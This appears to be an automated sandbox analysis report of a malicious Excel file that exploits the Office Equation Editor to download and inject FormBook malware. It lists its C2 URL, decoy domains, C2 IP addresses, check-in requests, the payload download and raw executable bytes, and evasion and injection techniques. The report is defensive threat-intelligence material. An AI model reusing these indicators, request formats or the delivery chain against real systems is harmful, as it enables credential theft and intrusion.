Analysis Report Processed APR12.xlsx

Overview

General Information

Sample Name: Processed APR12.xlsx
Analysis ID: 385456
MD5: c41fd90fc1e23885a1e075ce11d612e8
SHA1: d1903963f15c001baceb7c0e92998bc38a19f318
SHA256: 9328d5dcf7664d4a92915ba032a183e63ef8602445737f42bf4d479b8037e1c2
Tags: VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xles[1].exe ReversingLabs: Detection: 41%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 41%
Multi AV Scanner detection for submitted file
Source: Processed APR12.xlsx ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: vbc.exe, help.exe
Source: Binary string: help.pdb source: vbc.exe, 00000005.00000002.2229449674.0000000000699000.00000004.00000020.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_00D0AEB8
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 5_2_00416282
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop ebx 5_2_00406A94
Source: C:\Windows\SysWOW64\help.exe Code function: 4x nop then pop edi 7_2_00116282
Source: C:\Windows\SysWOW64\help.exe Code function: 4x nop then pop ebx 7_2_00106A95
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.centergolosinas.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 3.125.17.227:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 3.125.17.227:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 192.169.223.13:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 192.169.223.13:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 192.169.223.13:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 198.54.126.105:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 198.54.126.105:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 198.54.126.105:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.adultpeace.com/p2io/
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 12 Apr 2021 12:45:15 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Sun, 11 Apr 2021 17:55:36 GMTETag: "ccc00-5bfb61ab42963"Accept-Ranges: bytesContent-Length: 838656Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 60 33 73 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 c0 0c 00 00 0a 00 00 00 00 00 00 8e de 0c 00 00 20 00 00 00 e0 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 de 0c 00 57 00 00 00 00 e0 0c 00 50 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 be 0c 00 00 20 00 00 00 c0 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 50 06 00 00 00 e0 0c 00 00 08 00 00 00 c2 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0d 00 00 02 00 00 00 ca 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 de 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 30 eb 09 00 04 f3 02 00 03 00 00 00 39 00 00 06 88 
e0 02 00 a8 0a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 71 1b 41 9f 31 e7 6f 65 3c bb 46 1b 41 0f 49 b5 18 12 b8 72 9c a0 37 51 c8 e2 0c 6a af 4a c5 42 5f 7d b2 21 e8 e0 b7 1f 27 21 bf 50 12 e1 aa 5b 38 f1 bb 20 a9 83 e0 53 b7 5d 97 d8 c1 ef 04 c6 e2 95 84 5a 7d 51 f8 c4 36 e1 9b bf 12 6f 85 4a bb e4 9e 11 e3 ca 3e 23 03 a9 9e 06 37 84 bf 35 4d 22 ca 57 c5 aa fb 0e 06 c3 05 e7 ba 9e 39 5e 62 43 f5 0f 09 cf fb 22 01 d1 63 0a 1e 40 6c 40 3d a5 d3 35 57 2c f0 9f 1c 47 8c aa 66 f8 bb 67 6d 89 a3 4c 5a a2 78 aa 72 8b 84 c4 2f 3d 86 de 51 81 11 a3 9f ab f7 59 24 2d c9 0a 94 65 5f 16 76 61 09 37 60 d4 78 05 09 aa 44 ab f4 aa fa 0b 9b 0f 46 30 b0 06 e1 81 11 0f 2a 4a b6 5e d6 f2 ee 25 bf 2b 52 03 db 92 85 49 b4 d8 69 08 fa 6f b5 69 f3 6a 8b f7 3a 5e d2 ff ee 37 bc 54 23 85 c6 d5 00 1b b6 5a b6 de 81 49 c5 2f ec 3b c6 3c e7 c2 c7 db 35 e5 95 67 15 d0 5c 62 e7 29 5a a4 42 77 09 88 c0 6a d2 5c 2a cc fe 38 7b 70 a9 5b 28 e4 2f a1 c8 bb 2e 08
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /p2io/?oN6xpP=r2GsjHfDgbadIobDkfqM84hqAY3LnZYXU2evLvxsfUtrrcQFCKudTBmZizgvXIWWwk1k1Q==&NreTZ=JJE0B4uP-Jd HTTP/1.1 Host: www.centergolosinas.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?oN6xpP=RfOK6jKkDjXJwasAc5LTyAppaXreGCTFIzs53vHZyU46XfbA28pKG07a1ZehGkxvOhkisQ==&NreTZ=JJE0B4uP-Jd HTTP/1.1 Host: www.vectoroutlines.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?oN6xpP=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&NreTZ=JJE0B4uP-Jd HTTP/1.1 Host: www.ruhexuangou.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?oN6xpP=H0m9fF/8FL7QqYEOA4653EpAABAppk+gPA36EdDaEoCMlE2zCVYj51CG+i/1QazvQuiVHw==&NreTZ=JJE0B4uP-Jd HTTP/1.1 Host: www.dreamcashbuyers.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?oN6xpP=xikLqsOKlSWJt+SrZg8c4HdBraEMa/77ZWZXTseglAkSxnPi++5EYIqDKkXYJ2G/5JhnXw==&NreTZ=JJE0B4uP-Jd HTTP/1.1 Host: www.aideliveryrobot.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?oN6xpP=Ei6RqbmoUXtm0NxuUyb/BZtLNDk4B448l51n8Zz8P/g/u3IBdZc5bEJpDCmkA548du9Vog==&NreTZ=JJE0B4uP-Jd HTTP/1.1 Host: www.shopihy.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 52.58.78.16
Source: Joe Sandbox View IP Address: 23.82.57.32
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US
Source: Joe Sandbox View ASN Name: LEASEWEB-USA-SFO-12US
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /winme/xles.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 3.125.17.227 Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227 (identical entry repeated 50 times in the report)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C627CB57.emf
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2202179783.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: www.centergolosinas.com
Source: explorer.exe, 00000006.00000000.2219748309.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2219748309.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2204196235.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2202179783.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.2202179783.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000006.00000000.2202476584.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.2202476584.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000006.00000002.2393631974.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2182872595.0000000002726000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
